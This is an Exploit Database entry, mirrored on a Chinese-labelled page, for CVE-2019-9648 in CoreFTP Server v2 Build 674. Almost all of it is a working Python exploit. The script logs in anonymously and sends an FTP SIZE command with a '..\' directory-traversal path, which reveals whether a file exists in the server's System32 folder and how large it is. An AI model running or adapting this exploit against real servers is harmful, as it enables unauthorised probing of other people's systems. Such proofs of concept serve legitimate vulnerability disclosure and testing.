Core FTP Server FTP / SFTP Server v2 Build 674 – ‘SIZE’ Directory Traversal

• Exploit Database
• 11 阅读

• 作者： Kevin Randall
  日期： 2019-03-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46535/

• # Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674SIZE Directory Traversal
  # Google Dork: N/A
  # Date: 4/27/2019
  # Exploit Author: Kevin Randall
  # Vendor Homepage: https://www.coreftp.com
  # Software Link: http://www.coreftp.com/server/index.html
  # Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
  # Tested on: Windows 7
  # CVE : CVE-2019-9648
  
  
  #!/usr/bin/python
  
  import socket
  import sys
  
  ########################################################
  ###########Set Variables For Script Here################
  
  file_to_look_for = "nslookup.exe"
  local_disk_drive = " C:"
  path_traversal = "\..\..\..\..\..\Windows\System32\\"
  
  ########################################################
  print ("""
   ###### # ############### ###### ##### ###########
   # # # # # # ## # ## # # # # # # ### #
   # # # # # # # # # # # # # # ### #
   # # # ##### ########### # ####### ########### ######## #####
   ## ## # # # # # # # # ####### # #
   # # # # # ## ## # # # # # ### #
  ##### ######## ####### ### ########## ##### ##### # #####
  
  #######
  # ## ###### ##### #####
  ##### ### # #
  ##### ## ## ### # #
  # ## ######## # #
  ####### # #
  ####### ## ############ #
  
  # # ###### # ##
  ### ###### ##### ##### ###### ### # # # #### ####### ## # ##
  ### ## # # # ### ## ## # # ## ### # ## #
  ### ## # # # ###### ################### # # ##
  ### ###### # # ### ## # ## ## ### # ## #
  ### # ## # # ## ### # # #### ## ### # ##
   ## #### # # # ###### ########## ## ###### ## # ##
  
   ######
   # # ## ## ####### ##
   # ##### # ######
   ######## # ## ## ## ##
   # # ###### ## # ## ###### ##
   #### # ## ## ## ##
   # # ## ## ####### ###### ######
  
   """)
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  connect = s.connect(('192.168.0.4',21))
  
  s.recv(1024)
  s.send('USER anonymous\r\n')
  
  s.recv(1024)
  s.send('PASS anonymous\r\n')
  
  s.recv(1024)
  s.recv(1024)
  s.send('SIZE' +local_disk_drive+path_traversal+file_to_look_for + '\r\n')
  result = s.recv(2048)
  trimmedoutput = result.strip()
  splitoutput = trimmedoutput.split(' ')
  realresult = unicode (trimmedoutput,'utf-8')
  realresult2 = unicode (splitoutput[1],'utf-8')
  isnum = realresult.isnumeric()
  isnum2 = realresult2.isnumeric()
  if isnum2:
  print "The file " + file_to_look_for + " exist on the remote server. Here is the filesize:" + splitoutput[1]
  else:
  print "The file " + file_to_look_for + " does not exist on the remote server or one of the variables declared is incorrect."
  
  s.send('QUIT\r\n')
  
  s.close